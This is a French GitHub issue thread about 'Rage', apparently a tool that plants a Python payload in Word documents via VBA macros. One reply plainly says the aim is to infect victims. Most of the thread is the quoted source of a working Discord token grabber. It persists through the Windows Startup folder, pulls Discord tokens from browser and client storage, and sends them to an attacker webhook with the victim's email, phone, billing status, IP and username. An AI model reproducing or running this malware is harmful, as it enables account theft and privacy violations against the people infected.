Open dazd-pkz opened 2 years ago
ton histoire : + Very advanced token grabber click here to learn more, c'est cool mais le prob c'est qu'il execute tout ca au demarrage si je comprend bien donc bizarre hein ?
dit moi si je me trompe avec argument biensur !
le fichier se deplace au démarrage, et s execute en arriere plan oui ;) pourquoi tu trouves ça bizarre? cest le but du token grabber, infecter la victime...
rage c'est pas un logiciel pour pouvoir rendre "infecté" des fichiers word ? si oui, pourquoi on le fou au demarrage du .py ?
le but (de ce que je sais) c'est d'aider les gens a infecté le fichier, pas les infectés ?
parce quil ya un mode qui injecte un script python dans le fichier word, ce script python va se deplacer au demarrage pour que la victime soit infectée. lis le code...
path = "%s/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/rage.pyw" % getenv("userprofile") if not isfile(path): copy(file, path) startfile(path) remove(file) exit() elif file.replace('\', '/') != path.replace('\', '/'): exit() webhook = '""" + webhook + r"""' pingme = """ + str(ping) + r""" class Discord: def setheaders(token: str = None) -> dict: headers = {'content-type': 'application/json', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'} if token: headers['authorization'] = token return headers def get_tokens() -> list: tokens = [] LOCAL = getenv("LOCALAPPDATA") ROAMING = getenv("APPDATA") PATHS = { "Discord": ROAMING + "\Discord", "Discord Canary": ROAMING + "\discordcanary", "Discord PTB": ROAMING + "\discordptb", "Google Chrome": LOCAL + "\Google\Chrome\User Data\Default", "Opera": ROAMING + "\Opera Software\Opera Stable", "Brave": LOCAL + "\BraveSoftware\Brave-Browser\User Data\Default", "Yandex": LOCAL + "\Yandex\YandexBrowser\User Data\Default" } def search(path: str) -> list: path += "\Local Storage\leveldb" found_tokens = [] if isdir(path): for file_name in listdir(path): if not file_name.endswith(".log") and not file_name.endswith(".ldb"): continue for line in [x.strip() for x in open(f"{path}\{file_name}", errors="ignore").readlines() if x.strip()]: for regex in (r"[\w-]{24}.[\w-]{6}.[\w-]{27}", r"mfa.[\w-]{84}"): for token in findall(regex, line): try: urlopen(Request( "https://discord.com/api/v9/users/@me", headers=Discord.setheaders(token))) except HTTPError: continue if token not in found_tokens and token not in tokens: found_tokens.append(token) return found_tokens for path in PATHS: for token in search(PATHS[path]): tokens.append(token) return tokens class Grab: def token_grab(token: str): def getavatar(uid, aid) -> str: url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}" try: urlopen(Request(url, headers=Discord.setheaders())) except HTTPError: url += ".gif" return url def has_payment_methods(token) -> bool: has = False try: has = bool(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=Discord.setheaders(token))).read())) except: pass return has valid, invalid = "<:valide:858700826499219466>", "<:invalide:858700726905733120>" def verify(var): return valid if var else invalid user_data = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=Discord.setheaders(token))).read()) ip = loads(urlopen(Request('http://ipinfo.io/json')).read())['ip'] computer_username = getenv("username") username = user_data["username"] + \ "#" + str(user_data["discriminator"]) user_id = user_data["id"] avatar_id = user_data["avatar"] avatar_url = f"https://cdn.discordapp.com/avatars/{user_id}/{avatar_id}" email = user_data.get("email") phone = user_data.get("phone") mfa_enabled = bool(user_data['mfa_enabled']) email_verified = bool(user_data['verified']) billing = bool(has_payment_methods(token)) nitro = bool(user_data.get("premium_type")) nitro = valid if nitro else invalid email_verified = verify(email_verified) billing = verify(billing) mfa_enabled = verify(mfa_enabled) if not phone: phone = invalid data = [{ "title": "Rage", "description": "Grabbed!", "url": "https://github.com/billythegoat356/Rage", "image": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "color": 0xCB4335, "fields": [ { "name": "Infos Du Compte", "value": f'Email: {email}\nTéléphone: {phone}\nPaiement: {billing}', "inline": True }, { "name": "Infos du PC", "value": f"IP: {ip}\nUtilisateur: {computer_username}", "inline": True }, { "name": "Infos Supplémentaires", "value": f'Nitro: {nitro}\n2FA: {mfa_enabled}', "inline": False }, { "name": "Token", "value": f"||{token}||", "inline": False } ], "author": { "name": f"{username}", "icon_url": avatar_url }, "thumbnail": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "footer": { "text": "by billythegoat356" } }] Grab.send(data) def send(data: str): data = {"username": "Rage", "avatar_url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb", "embeds": data, "content": "@everyone" if pingme else ""} return urlopen(Request(webhook, data=dumps(data).encode('utf-8'), headers=Discord.setheaders())) sent_tokens = [] def token_grab(): for token in Discord.get_tokens(): if token not in sent_tokens: Grab.token_grab(token) sent_tokens.append(token) ready_data = [{ "title": "Rage", "description": "Initialized!", "url": "https://github.com/billythegoat356/Rage", "image": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "color": 0xCB4335, "fields": [ { "name": "Ready!", "value": 'I am ready to find some tokens!', "inline": True } ], "thumbnail": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "footer": { "text": "by billythegoat356" } }] Grab.send(ready_data) while True: if not isfile(file): exit() token_grab() """
End Sub""" return vba
def mkcustomscript(link: str, extension: str) -> str:
End Sub"""